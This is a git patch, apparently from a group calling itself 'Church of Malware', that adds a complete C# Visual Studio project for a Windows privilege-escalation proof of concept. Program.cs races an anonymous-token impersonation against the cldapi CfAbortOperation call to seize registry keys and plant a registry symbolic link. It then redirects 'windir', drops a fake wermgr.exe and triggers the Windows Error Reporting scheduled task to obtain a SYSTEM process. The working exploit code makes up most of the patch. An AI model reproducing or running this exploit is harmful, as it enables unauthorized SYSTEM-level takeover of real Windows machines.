From 4f2501d1d5f19a8024b06d3fa98f8b9bcfa92eae Mon Sep 17 00:00:00 2001
From: Church of Malware <ek0ms@noreply.git.churchofmalware.org>
Date: Wed, 10 Jun 2026 01:02:32 +0000
Subject: [PATCH] Upload files to "PoC_AbortHydration_ArbitraryRegKey_EoP"

---
 .../FodyWeavers.xsd                           | 186 +++++++++
 ..._AbortHydration_ArbitraryRegKey_EoP.csproj | 125 ++++++
 ...tHydration_ArbitraryRegKey_EoP.csproj.user |  13 +
 .../Program.cs                                | 369 ++++++++++++++++++
 .../packages.config                           |   7 +
 5 files changed, 700 insertions(+)
 create mode 100644 PoC_AbortHydration_ArbitraryRegKey_EoP/FodyWeavers.xsd
 create mode 100644 PoC_AbortHydration_ArbitraryRegKey_EoP/PoC_AbortHydration_ArbitraryRegKey_EoP.csproj
 create mode 100644 PoC_AbortHydration_ArbitraryRegKey_EoP/PoC_AbortHydration_ArbitraryRegKey_EoP.csproj.user
 create mode 100644 PoC_AbortHydration_ArbitraryRegKey_EoP/Program.cs
 create mode 100644 PoC_AbortHydration_ArbitraryRegKey_EoP/packages.config

diff --git a/PoC_AbortHydration_ArbitraryRegKey_EoP/FodyWeavers.xsd b/PoC_AbortHydration_ArbitraryRegKey_EoP/FodyWeavers.xsd
new file mode 100644
index 0000000..c0df09d
--- /dev/null
+++ b/PoC_AbortHydration_ArbitraryRegKey_EoP/FodyWeavers.xsd
@@ -0,0 +1,186 @@
+<?xml version="1.0" encoding="utf-8"?>
+<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
+  <!-- This file was generated by Fody. Manual changes to this file will be lost when your project is rebuilt. -->
+  <xs:element name="Weavers">
+    <xs:complexType>
+      <xs:all>
+        <xs:element name="Costura" minOccurs="0" maxOccurs="1">
+          <xs:complexType>
+            <xs:all>
+              <xs:element minOccurs="0" maxOccurs="1" name="ExcludeAssemblies" type="xs:string">
+                <xs:annotation>
+                  <xs:documentation>A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with line breaks</xs:documentation>
+                </xs:annotation>
+              </xs:element>
+              <xs:element minOccurs="0" maxOccurs="1" name="IncludeAssemblies" type="xs:string">
+                <xs:annotation>
+                  <xs:documentation>A list of assembly names to include from the default action of "embed all Copy Local references", delimited with line breaks.</xs:documentation>
+                </xs:annotation>
+              </xs:element>
+              <xs:element minOccurs="0" maxOccurs="1" name="ExcludeRuntimeAssemblies" type="xs:string">
+                <xs:annotation>
+                  <xs:documentation>A list of runtime assembly names to exclude from the default action of "embed all Copy Local references", delimited with line breaks</xs:documentation>
+                </xs:annotation>
+              </xs:element>
+              <xs:element minOccurs="0" maxOccurs="1" name="IncludeRuntimeAssemblies" type="xs:string">
+                <xs:annotation>
+                  <xs:documentation>A list of runtime assembly names to include from the default action of "embed all Copy Local references", delimited with line breaks.</xs:documentation>
+                </xs:annotation>
+              </xs:element>
+              <xs:element minOccurs="0" maxOccurs="1" name="ExcludeRuntimes" type="xs:string">
+                <xs:annotation>
+                  <xs:documentation>A list of runtimes to exclude from the default action of "embed all Copy Local references", delimited with line breaks</xs:documentation>
+                </xs:annotation>
+              </xs:element>
+              <xs:element minOccurs="0" maxOccurs="1" name="IncludeRuntimes" type="xs:string">
+                <xs:annotation>
+                  <xs:documentation>A list of runtimes names to include from the default action of "embed all Copy Local references", delimited with line breaks.</xs:documentation>
+                </xs:annotation>
+              </xs:element>
+              <xs:element minOccurs="0" maxOccurs="1" name="Unmanaged32Assemblies" type="xs:string">
+                <xs:annotation>
+                  <xs:documentation>Obsolete, use UnmanagedWinX86Assemblies instead</xs:documentation>
+                </xs:annotation>
+              </xs:element>
+              <xs:element minOccurs="0" maxOccurs="1" name="UnmanagedWinX86Assemblies" type="xs:string">
+                <xs:annotation>
+                  <xs:documentation>A list of unmanaged X86 (32 bit) assembly names to include, delimited with line breaks.</xs:documentation>
+                </xs:annotation>
+              </xs:element>
+              <xs:element minOccurs="0" maxOccurs="1" name="Unmanaged64Assemblies" type="xs:string">
+                <xs:annotation>
+                  <xs:documentation>Obsolete, use UnmanagedWinX64Assemblies instead.</xs:documentation>
+                </xs:annotation>
+              </xs:element>
+              <xs:element minOccurs="0" maxOccurs="1" name="UnmanagedWinX64Assemblies" type="xs:string">
+                <xs:annotation>
+                  <xs:documentation>A list of unmanaged X64 (64 bit) assembly names to include, delimited with line breaks.</xs:documentation>
+                </xs:annotation>
+              </xs:element>
+              <xs:element minOccurs="0" maxOccurs="1" name="UnmanagedWinArm64Assemblies" type="xs:string">
+                <xs:annotation>
+                  <xs:documentation>A list of unmanaged Arm64 (64 bit) assembly names to include, delimited with line breaks.</xs:documentation>
+                </xs:annotation>
+              </xs:element>
+              <xs:element minOccurs="0" maxOccurs="1" name="PreloadOrder" type="xs:string">
+                <xs:annotation>
+                  <xs:documentation>The order of preloaded assemblies, delimited with line breaks.</xs:documentation>
+                </xs:annotation>
+              </xs:element>
+            </xs:all>
+            <xs:attribute name="CreateTemporaryAssemblies" type="xs:boolean">
+              <xs:annotation>
+                <xs:documentation>This will copy embedded files to disk before loading them into memory. This is helpful for some scenarios that expected an assembly to be loaded from a physical file.</xs:documentation>
+              </xs:annotation>
+            </xs:attribute>
+            <xs:attribute name="IncludeDebugSymbols" type="xs:boolean">
+              <xs:annotation>
+                <xs:documentation>Controls if .pdbs for reference assemblies are also embedded.</xs:documentation>
+              </xs:annotation>
+            </xs:attribute>
+            <xs:attribute name="IncludeRuntimeReferences" type="xs:boolean">
+              <xs:annotation>
+                <xs:documentation>Controls if runtime assemblies are also embedded.</xs:documentation>
+              </xs:annotation>
+            </xs:attribute>
+            <xs:attribute name="UseRuntimeReferencePaths" type="xs:boolean">
+              <xs:annotation>
+                <xs:documentation>Controls whether the runtime assemblies are embedded with their full path or only with their assembly name.</xs:documentation>
+              </xs:annotation>
+            </xs:attribute>
+            <xs:attribute name="DisableCompression" type="xs:boolean">
+              <xs:annotation>
+                <xs:documentation>Embedded assemblies are compressed by default, and uncompressed when they are loaded. You can turn compression off with this option.</xs:documentation>
+              </xs:annotation>
+            </xs:attribute>
+            <xs:attribute name="DisableCleanup" type="xs:boolean">
+              <xs:annotation>
+                <xs:documentation>As part of Costura, embedded assemblies are no longer included as part of the build. This cleanup can be turned off.</xs:documentation>
+              </xs:annotation>
+            </xs:attribute>
+            <xs:attribute name="DisableEventSubscription" type="xs:boolean">
+              <xs:annotation>
+                <xs:documentation>The attach method no longer subscribes to the `AppDomain.AssemblyResolve` (.NET 4.x) and `AssemblyLoadContext.Resolving` (.NET 6.0+) events.</xs:documentation>
+              </xs:annotation>
+            </xs:attribute>
+            <xs:attribute name="LoadAtModuleInit" type="xs:boolean">
+              <xs:annotation>
+                <xs:documentation>Costura by default will load as part of the module initialization. This flag disables that behavior. Make sure you call CosturaUtility.Initialize() somewhere in your code.</xs:documentation>
+              </xs:annotation>
+            </xs:attribute>
+            <xs:attribute name="IgnoreSatelliteAssemblies" type="xs:boolean">
+              <xs:annotation>
+                <xs:documentation>Costura will by default use assemblies with a name like 'resources.dll' as a satellite resource and prepend the output path. This flag disables that behavior.</xs:documentation>
+              </xs:annotation>
+            </xs:attribute>
+            <xs:attribute name="ExcludeAssemblies" type="xs:string">
+              <xs:annotation>
+                <xs:documentation>A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with |</xs:documentation>
+              </xs:annotation>
+            </xs:attribute>
+            <xs:attribute name="IncludeAssemblies" type="xs:string">
+              <xs:annotation>
+                <xs:documentation>A list of assembly names to include from the default action of "embed all Copy Local references", delimited with |.</xs:documentation>
+              </xs:annotation>
+            </xs:attribute>
+            <xs:attribute name="ExcludeRuntimeAssemblies" type="xs:string">
+              <xs:annotation>
+                <xs:documentation>A list of runtime assembly names to exclude from the default action of "embed all Copy Local references", delimited with |</xs:documentation>
+              </xs:annotation>
+            </xs:attribute>
+            <xs:attribute name="IncludeRuntimeAssemblies" type="xs:string">
+              <xs:annotation>
+                <xs:documentation>A list of runtime assembly names to include from the default action of "embed all Copy Local references", delimited with |.</xs:documentation>
+              </xs:annotation>
+            </xs:attribute>
+            <xs:attribute name="Unmanaged32Assemblies" type="xs:string">
+              <xs:annotation>
+                <xs:documentation>Obsolete, use UnmanagedWinX86Assemblies instead</xs:documentation>
+              </xs:annotation>
+            </xs:attribute>
+            <xs:attribute name="UnmanagedWinX86Assemblies" type="xs:string">
+              <xs:annotation>
+                <xs:documentation>A list of unmanaged X86 (32 bit) assembly names to include, delimited with |.</xs:documentation>
+              </xs:annotation>
+            </xs:attribute>
+            <xs:attribute name="Unmanaged64Assemblies" type="xs:string">
+              <xs:annotation>
+                <xs:documentation>Obsolete, use UnmanagedWinX64Assemblies instead</xs:documentation>
+              </xs:annotation>
+            </xs:attribute>
+            <xs:attribute name="UnmanagedWinX64Assemblies" type="xs:string">
+              <xs:annotation>
+                <xs:documentation>A list of unmanaged X64 (64 bit) assembly names to include, delimited with |.</xs:documentation>
+              </xs:annotation>
+            </xs:attribute>
+            <xs:attribute name="UnmanagedWinArm64Assemblies" type="xs:string">
+              <xs:annotation>
+                <xs:documentation>A list of unmanaged Arm64 (64 bit) assembly names to include, delimited with |.</xs:documentation>
+              </xs:annotation>
+            </xs:attribute>
+            <xs:attribute name="PreloadOrder" type="xs:string">
+              <xs:annotation>
+                <xs:documentation>The order of preloaded assemblies, delimited with |.</xs:documentation>
+              </xs:annotation>
+            </xs:attribute>
+          </xs:complexType>
+        </xs:element>
+      </xs:all>
+      <xs:attribute name="VerifyAssembly" type="xs:boolean">
+        <xs:annotation>
+          <xs:documentation>'true' to run assembly verification (PEVerify) on the target assembly after all weavers have been executed.</xs:documentation>
+        </xs:annotation>
+      </xs:attribute>
+      <xs:attribute name="VerifyIgnoreCodes" type="xs:string">
+        <xs:annotation>
+          <xs:documentation>A comma-separated list of error codes that can be safely ignored in assembly verification.</xs:documentation>
+        </xs:annotation>
+      </xs:attribute>
+      <xs:attribute name="GenerateXsd" type="xs:boolean">
+        <xs:annotation>
+          <xs:documentation>'false' to turn off automatic generation of the XML Schema file.</xs:documentation>
+        </xs:annotation>
+      </xs:attribute>
+    </xs:complexType>
+  </xs:element>
+</xs:schema>
\ No newline at end of file
diff --git a/PoC_AbortHydration_ArbitraryRegKey_EoP/PoC_AbortHydration_ArbitraryRegKey_EoP.csproj b/PoC_AbortHydration_ArbitraryRegKey_EoP/PoC_AbortHydration_ArbitraryRegKey_EoP.csproj
new file mode 100644
index 0000000..eb8e0af
--- /dev/null
+++ b/PoC_AbortHydration_ArbitraryRegKey_EoP/PoC_AbortHydration_ArbitraryRegKey_EoP.csproj
@@ -0,0 +1,125 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <Import Project="..\packages\Costura.Fody.6.2.0\build\Costura.Fody.props" Condition="Exists('..\packages\Costura.Fody.6.2.0\build\Costura.Fody.props')" />
+  <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
+  <PropertyGroup>
+    <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
+    <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
+    <ProjectGuid>{352F6DD7-9B05-4896-9E7D-2EFA36EAC6E3}</ProjectGuid>
+    <OutputType>Exe</OutputType>
+    <UseAppHost>true</UseAppHost>
+    <RootNamespace>PoC_AbortHydration_ArbitraryRegKey_EoP</RootNamespace>
+    <AssemblyName>PoC_AbortHydration_ArbitraryRegKey_EoP</AssemblyName>
+    <TargetFrameworkVersion>v4.8.1</TargetFrameworkVersion>
+    <FileAlignment>512</FileAlignment>
+    <AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>
+    <Deterministic>true</Deterministic>
+    <IsWebBootstrapper>false</IsWebBootstrapper>
+    <NuGetPackageImportStamp>
+    </NuGetPackageImportStamp>
+    <TargetFrameworkProfile />
+    <PublishUrl>publish\</PublishUrl>
+    <Install>true</Install>
+    <InstallFrom>Disk</InstallFrom>
+    <UpdateEnabled>false</UpdateEnabled>
+    <UpdateMode>Foreground</UpdateMode>
+    <UpdateInterval>7</UpdateInterval>
+    <UpdateIntervalUnits>Days</UpdateIntervalUnits>
+    <UpdatePeriodically>false</UpdatePeriodically>
+    <UpdateRequired>false</UpdateRequired>
+    <MapFileExtensions>true</MapFileExtensions>
+    <ApplicationRevision>1</ApplicationRevision>
+    <ApplicationVersion>1.0.0.%2a</ApplicationVersion>
+    <UseApplicationTrust>false</UseApplicationTrust>
+    <PublishWizardCompleted>true</PublishWizardCompleted>
+    <BootstrapperEnabled>true</BootstrapperEnabled>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
+    <PlatformTarget>AnyCPU</PlatformTarget>
+    <DebugSymbols>true</DebugSymbols>
+    <DebugType>full</DebugType>
+    <Optimize>false</Optimize>
+    <OutputPath>bin\Debug\</OutputPath>
+    <DefineConstants>DEBUG;TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+    <Prefer32Bit>false</Prefer32Bit>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
+    <PlatformTarget>AnyCPU</PlatformTarget>
+    <DebugType>pdbonly</DebugType>
+    <Optimize>true</Optimize>
+    <OutputPath>bin\Release\</OutputPath>
+    <DefineConstants>TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+    <Prefer32Bit>false</Prefer32Bit>
+  </PropertyGroup>
+  <PropertyGroup>
+    <ManifestCertificateThumbprint>0F28BB121C2D5CEE6A57C741514F51E5F2D9ECAD</ManifestCertificateThumbprint>
+  </PropertyGroup>
+  <PropertyGroup>
+    <ManifestKeyFile>PoC_AbortHydration_ArbitraryRegKey_EoP_TemporaryKey.pfx</ManifestKeyFile>
+  </PropertyGroup>
+  <PropertyGroup>
+    <GenerateManifests>true</GenerateManifests>
+  </PropertyGroup>
+  <PropertyGroup>
+    <SignManifests>true</SignManifests>
+  </PropertyGroup>
+  <ItemGroup>
+    <Reference Include="Costura, Version=6.2.0.0, Culture=neutral, PublicKeyToken=9919ef960d84173d, processorArchitecture=MSIL">
+      <HintPath>..\packages\Costura.Fody.6.2.0\lib\netstandard2.0\Costura.dll</HintPath>
+    </Reference>
+    <Reference Include="Microsoft.Win32.TaskScheduler, Version=2.12.1.0, Culture=neutral, PublicKeyToken=2806574b39b74d4b, processorArchitecture=MSIL">
+      <HintPath>..\packages\TaskScheduler.2.12.2\lib\net48\Microsoft.Win32.TaskScheduler.dll</HintPath>
+    </Reference>
+    <Reference Include="NtApiDotNet, Version=1.0.0.0, Culture=neutral, processorArchitecture=MSIL">
+      <HintPath>..\packages\NtApiDotNet.1.1.33\lib\net461\NtApiDotNet.dll</HintPath>
+    </Reference>
+    <Reference Include="System" />
+    <Reference Include="System.ComponentModel.Composition" />
+    <Reference Include="System.Core" />
+    <Reference Include="System.DirectoryServices" />
+    <Reference Include="System.Drawing" />
+    <Reference Include="System.IO.Compression.FileSystem" />
+    <Reference Include="System.Numerics" />
+    <Reference Include="System.Security" />
+    <Reference Include="System.Xml.Linq" />
+    <Reference Include="System.Data.DataSetExtensions" />
+    <Reference Include="Microsoft.CSharp" />
+    <Reference Include="System.Data" />
+    <Reference Include="System.Xml" />
+  </ItemGroup>
+  <ItemGroup>
+    <Compile Include="Program.cs" />
+    <Compile Include="Properties\AssemblyInfo.cs" />
+  </ItemGroup>
+  <ItemGroup>
+    <None Include="App.config" />
+    <None Include="packages.config" />
+  </ItemGroup>
+  <ItemGroup>
+    <BootstrapperPackage Include=".NETFramework,Version=v4.7.2">
+      <Visible>False</Visible>
+      <ProductName>Microsoft .NET Framework 4.7.2 %28x86 and x64%29</ProductName>
+      <Install>true</Install>
+    </BootstrapperPackage>
+    <BootstrapperPackage Include="Microsoft.Net.Framework.3.5.SP1">
+      <Visible>False</Visible>
+      <ProductName>.NET Framework 3.5 SP1</ProductName>
+      <Install>false</Install>
+    </BootstrapperPackage>
+  </ItemGroup>
+  <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
+  <Import Project="..\packages\Fody.6.9.3\build\Fody.targets" Condition="Exists('..\packages\Fody.6.9.3\build\Fody.targets')" />
+  <Target Name="EnsureNuGetPackageBuildImports" BeforeTargets="PrepareForBuild">
+    <PropertyGroup>
+      <ErrorText>This project references NuGet package(s) that are missing on this computer. Use NuGet Package Restore to download them.  For more information, see http://go.microsoft.com/fwlink/?LinkID=322105. The missing file is {0}.</ErrorText>
+    </PropertyGroup>
+    <Error Condition="!Exists('..\packages\Fody.6.9.3\build\Fody.targets')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\Fody.6.9.3\build\Fody.targets'))" />
+    <Error Condition="!Exists('..\packages\Costura.Fody.6.2.0\build\Costura.Fody.props')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\Costura.Fody.6.2.0\build\Costura.Fody.props'))" />
+    <Error Condition="!Exists('..\packages\Costura.Fody.6.2.0\build\Costura.Fody.targets')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\Costura.Fody.6.2.0\build\Costura.Fody.targets'))" />
+  </Target>
+  <Import Project="..\packages\Costura.Fody.6.2.0\build\Costura.Fody.targets" Condition="Exists('..\packages\Costura.Fody.6.2.0\build\Costura.Fody.targets')" />
+</Project>
\ No newline at end of file
diff --git a/PoC_AbortHydration_ArbitraryRegKey_EoP/PoC_AbortHydration_ArbitraryRegKey_EoP.csproj.user b/PoC_AbortHydration_ArbitraryRegKey_EoP/PoC_AbortHydration_ArbitraryRegKey_EoP.csproj.user
new file mode 100644
index 0000000..75eb54d
--- /dev/null
+++ b/PoC_AbortHydration_ArbitraryRegKey_EoP/PoC_AbortHydration_ArbitraryRegKey_EoP.csproj.user
@@ -0,0 +1,13 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <PropertyGroup>
+    <PublishUrlHistory>publish\</PublishUrlHistory>
+    <InstallUrlHistory />
+    <SupportUrlHistory />
+    <UpdateUrlHistory />
+    <BootstrapperUrlHistory />
+    <ErrorReportUrlHistory />
+    <FallbackCulture>en-US</FallbackCulture>
+    <VerifyUploadedFiles>false</VerifyUploadedFiles>
+  </PropertyGroup>
+</Project>
\ No newline at end of file
diff --git a/PoC_AbortHydration_ArbitraryRegKey_EoP/Program.cs b/PoC_AbortHydration_ArbitraryRegKey_EoP/Program.cs
new file mode 100644
index 0000000..afe21d1
--- /dev/null
+++ b/PoC_AbortHydration_ArbitraryRegKey_EoP/Program.cs
@@ -0,0 +1,369 @@
+using Microsoft.Win32;
+using Microsoft.Win32.TaskScheduler;
+using NtApiDotNet;
+using NtApiDotNet.Win32;
+using System;
+using System.Diagnostics;
+using System.IO;
+using System.IO.Pipes;
+using System.Runtime.InteropServices;
+using System.Security.AccessControl;
+using System.Security.Cryptography;
+using System.Security.Permissions;
+using System.Threading;
+
+namespace PoC_AbortHydration_ArbitraryRegKey_EoP
+{
+    static class Program
+    {
+        static NtKey OpenKey(NtKey root, string path, KeyAccessRights desired_access)
+        {
+            Console.WriteLine("Opening for {0}", desired_access);
+            using (var obja = new ObjectAttributes(path, AttributeFlags.OpenLink, root))
+            {
+                using (var key = NtKey.Open(obja, desired_access, KeyCreateOptions.NonVolatile, false))
+                {
+                    if (key.IsSuccess)
+                        return key.Result.Duplicate();
+                }
+
+                using (var imp = NtThread.Current.ImpersonateAnonymousToken())
+                {
+                    return NtKey.Open(obja, desired_access, KeyCreateOptions.NonVolatile);
+                }
+            }
+        }
+
+        static void SetSecurityDescriptor(NtKey key, SecurityInformation info)
+        {
+            var sd = new SecurityDescriptor("D:(A;OICIIO;GA;;;WD)(A;OICIIO;GA;;;AN)(A;;GA;;;WD)(A;;GA;;;AN)S:(ML;OICI;NW;;;S-1-16-0)");
+            key.SetSecurityDescriptor(sd, info);
+        }
+
+        static void ForceKeyDeleteKey(NtKey root, string name)
+        {
+            Console.WriteLine(@"Deleting {0}\{1}", root.FullPath, name);
+            using (var key = OpenKey(root, name, KeyAccessRights.WriteDac))
+            {
+                Console.WriteLine("Opened for WriteDac");
+                SetSecurityDescriptor(key, SecurityInformation.Dacl);
+            }
+
+            using (var key = OpenKey(root, name, KeyAccessRights.WriteOwner))
+            {
+                Console.WriteLine("Opened for WriteOwner");
+                SetSecurityDescriptor(key, SecurityInformation.Label);
+            }
+
+            using (var new_key = OpenKey(root, name, KeyAccessRights.Delete | KeyAccessRights.EnumerateSubKeys))
+            {
+                Console.WriteLine("Opened for enumerate.");
+                DeleteRegistryTree(new_key);
+                new_key.Delete();
+            }
+        }
+
+        static void DeleteRegistryTree(NtKey root)
+        {
+            foreach (var name in root.QueryKeys())
+            {
+                ForceKeyDeleteKey(root, name);
+            }
+        }
+
+        [Flags]
+        enum AbortHydrationFlags
+        {
+            None = 0,
+            Unblock = 1,
+            Block = 2,
+        }
+
+        [DllImport("cldapi.dll", CharSet = CharSet.Unicode)]
+        static extern int CfAbortOperation(int pid, IntPtr unknown, AbortHydrationFlags flags);
+
+
+        [StructLayout(LayoutKind.Sequential)]
+        struct CF_PLATFORM_INFO
+        {
+            public int BuildNumber;
+            public int RevisionNumber;
+            public int IntegrationNumber;
+        }
+
+        [DllImport("cldapi.dll", CharSet = CharSet.Unicode)]
+        static extern int CfGetPlatformInfo(
+          out CF_PLATFORM_INFO PlatformVersion
+        );
+
+        static void ForceTokenThread(object obj)
+        {
+            try
+            {
+                using (var thread = (NtThread)obj)
+                {
+                    Console.WriteLine("In force token thread {0}", thread);
+                    using (var token = TokenUtils.GetAnonymousToken())
+                    {
+                        while (true)
+                        {
+                            thread.SetImpersonationToken(token);
+                            thread.SetImpersonationToken(null);
+                        }
+                    }
+                }
+            }
+            catch(ThreadAbortException)
+            {
+                return;
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine(ex);
+            }
+        }
+
+        const string ROOT_KEY = @"\Registry\User\.DEFAULT\Software\Policies\Microsoft";
+        static string CLOUD_FILES = $@"{ROOT_KEY}\CloudFiles";
+        static string BLOCKED_APPS = $@"{CLOUD_FILES}\BlockedApps";
+        const string TARGET_KEY = @"\Registry\User\.DEFAULT\Volatile Environment";
+
+        static void CheckKeyThread(object root_key)
+        {
+            string path = (bool)root_key ? ROOT_KEY : @"\Registry\User\.DEFAULT";
+            try
+            {
+                using (var key = NtKey.Open(path, null, KeyAccessRights.MaximumAllowed))
+                {
+                    while (true)
+                    {
+                        if (key.NotifyChange(NotifyCompletionFilter.Name, true) == NtStatus.STATUS_NOTIFY_ENUM_DIR)
+                        {
+                            Console.WriteLine("Change detected.");
+                            Environment.Exit(0);
+                            break;
+                        }
+                    }
+                }
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine(ex);
+            }
+        }
+
+        static int Check(this int hr)
+        {
+            if (hr < 0)
+                Marshal.ThrowExceptionForHR(hr);
+            return hr;
+        }
+
+        const int MAX_STAGE = 4;
+
+        static void Stage0()
+        {
+            for (int i = 1; i < MAX_STAGE; ++i)
+            {
+                Win32ProcessConfig config = new Win32ProcessConfig
+                {
+                    CommandLine = $"run {i}",
+                    ApplicationName = typeof(Program).Assembly.Location,
+                    TerminateOnDispose = true
+                };
+
+                using (var p = Win32Process.CreateProcess(config))
+                {
+                    if (p.Process.Wait(10) != NtStatus.STATUS_SUCCESS)
+                    {
+                        throw new ArgumentException($"Failed to run stage {i}");
+                    }
+                }
+            }
+        }
+
+        static void Stage1(bool root_key)
+        {
+            Thread check_key_th = new Thread(CheckKeyThread);
+            check_key_th.IsBackground = true;
+            check_key_th.Start(root_key);
+            Thread.Sleep(1000);
+
+            var th = NtThread.OpenCurrent();
+            var anon_thread = new Thread(ForceTokenThread)
+            {
+                IsBackground = true
+            };
+            anon_thread.Start(th);
+
+            while (true)
+            {
+                CfAbortOperation(NtProcess.Current.ProcessId,
+                    IntPtr.Zero, AbortHydrationFlags.Block);
+            }
+        }
+
+        static void Stage2()
+        {
+            using (var key = OpenKey(null, CLOUD_FILES, KeyAccessRights.WriteDac | KeyAccessRights.WriteOwner | KeyAccessRights.EnumerateSubKeys))
+            {
+                SetSecurityDescriptor(key, SecurityInformation.Dacl | SecurityInformation.Label);
+                DeleteRegistryTree(key);
+            }
+
+            NtKey.CreateSymbolicLink(BLOCKED_APPS, null, TARGET_KEY);
+            Stage1(false);
+        }
+
+        static void Stage3()
+        {
+            using (var key = OpenKey(null, BLOCKED_APPS, KeyAccessRights.Delete))
+            {
+                Console.WriteLine("Cleaning up link {0}", key.FullPath);
+                key.Delete();
+            }
+
+            using (var key = OpenKey(null, TARGET_KEY, KeyAccessRights.WriteDac | KeyAccessRights.WriteOwner))
+            {
+                SetSecurityDescriptor(key, SecurityInformation.Dacl | SecurityInformation.Label);
+            }
+            var key2 = Registry.Users.OpenSubKey(@".DEFAULT\Volatile Environment", RegistryRights.FullControl);
+            foreach(var subkey in key2.GetSubKeyNames())
+            {
+                var fullsubkey = TARGET_KEY + @"\" + subkey;
+                Console.WriteLine("Cleaning up subkey {0}", fullsubkey);
+                NtKey _subkey;
+                try
+                {
+                    _subkey = NtKey.Open(fullsubkey, null, KeyAccessRights.WriteDac);
+                }
+                catch (Exception ex)
+                {
+                    
+                    _subkey = OpenKey(null, fullsubkey, KeyAccessRights.WriteDac);
+                }
+                SetSecurityDescriptor(_subkey, SecurityInformation.Dacl);
+                _subkey.Close();
+                _subkey = NtKey.Open(fullsubkey, null, KeyAccessRights.Delete);
+                _subkey.Delete();
+                _subkey.Close();
+            }
+            
+            key2.Close();
+            using(NtKey ntarget = NtKey.Open(TARGET_KEY,null,KeyAccessRights.SetValue))
+            {
+                ntarget.SetValue("windir", Path.GetDirectoryName(Process.GetCurrentProcess().MainModule.FileName));
+            }
+            
+            string fakesys32 = Path.GetDirectoryName(Process.GetCurrentProcess().MainModule.FileName) + @"\System32";
+            Directory.CreateDirectory(fakesys32);
+            string fakewer = fakesys32 + @"\wermgr.exe";
+            File.Copy(Process.GetCurrentProcess().MainModule.FileName, fakewer, true);
+
+            var srvnamedpipe = new NamedPipeServerStream("MiniPlasmaWERPipe");
+            System.Threading.Tasks.Task pipewait = srvnamedpipe.WaitForConnectionAsync();
+
+            using (TaskService tasksvc = new TaskService())
+            {
+                Task wertask = tasksvc.GetTask(@"\Microsoft\Windows\Windows Error Reporting\QueueReporting");
+                wertask.Run();
+                wertask.Dispose();
+            }
+            if(!pipewait.Wait(2000))
+            {
+                Console.WriteLine("Exploit failed.");
+            }
+            else
+            {
+                Console.WriteLine("Exploit succeeded.");
+            }
+            srvnamedpipe.Dispose();
+            Thread.Sleep(1000);
+            try
+            {
+                File.Delete(fakewer);
+                Directory.Delete(fakesys32);
+            }
+            catch (Exception ex)
+            { }
+            using (NtKey ntarget = NtKey.Open(TARGET_KEY, null, KeyAccessRights.Delete))
+            {
+                ntarget.Delete(false);
+            }
+
+        }
+
+        [DllImport("kernel32.dll", SetLastError = true)]
+        public static extern bool GetNamedPipeServerSessionId(IntPtr Pipe, out UInt32 ClientProcessId);
+
+        static void Main(string[] args)
+        {
+            bool isSystem;
+            using (var identity = System.Security.Principal.WindowsIdentity.GetCurrent())
+            {
+                isSystem = identity.IsSystem;
+            }
+            if (isSystem)
+            {
+                Environment.SetEnvironmentVariable("windir", @"C:\Windows",EnvironmentVariableTarget.Process);
+                var namedpipeclient = new NamedPipeClientStream("MiniPlasmaWERPipe");
+                namedpipeclient.Connect();
+                UInt32 nSesID;
+                IntPtr hPipe = namedpipeclient.SafePipeHandle.DangerousGetHandle();
+                if (!GetNamedPipeServerSessionId(hPipe, out nSesID))
+                    return;
+                namedpipeclient.Dispose();
+                NtToken token = NtToken.OpenEffectiveToken();
+                NtToken token2 = token.DuplicateToken();
+                token.Dispose();
+                token = token2;
+                token.SetSessionId(((int)nSesID));
+                Win32Process.CreateProcessAsUser(token, @"C:\Windows\System32\conhost.exe", "", CreateProcessFlags.None, null);
+                return;
+
+            }
+
+
+            try
+            {
+                CfGetPlatformInfo(out CF_PLATFORM_INFO _).Check();
+
+                if (args.Length <= 1)
+                {
+                    int stage = args.Length > 0 ? int.Parse(args[0]) : 0;
+                    switch (stage)
+                    {
+                        case 0:
+                            Stage0();
+                            break;
+                        case 1:
+                            Stage1(true);
+                            break;
+                        case 2:
+                            Stage2();
+                            break;
+                        case 3:
+                            Stage3();
+                            break;
+                        default:
+                            throw new ArgumentException("Erm?");
+                    }
+                }
+                else
+                {
+                    using (var token = TokenUtils.GetLogonUserToken(args[0], "", args[1], SecurityLogonType.Network, null))
+                    {
+                        using (var imp = token.Impersonate())
+                        {
+                            CfAbortOperation(NtProcess.Current.ProcessId, IntPtr.Zero, AbortHydrationFlags.Block).Check();
+                        }
+                    }
+                }
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine(ex);
+            }
+        }
+    }
+}
diff --git a/PoC_AbortHydration_ArbitraryRegKey_EoP/packages.config b/PoC_AbortHydration_ArbitraryRegKey_EoP/packages.config
new file mode 100644
index 0000000..e7e6172
--- /dev/null
+++ b/PoC_AbortHydration_ArbitraryRegKey_EoP/packages.config
@@ -0,0 +1,7 @@
+<?xml version="1.0" encoding="utf-8"?>
+<packages>
+  <package id="Costura.Fody" version="6.2.0" targetFramework="net472" developmentDependency="true" />
+  <package id="Fody" version="6.9.3" targetFramework="net472" developmentDependency="true" />
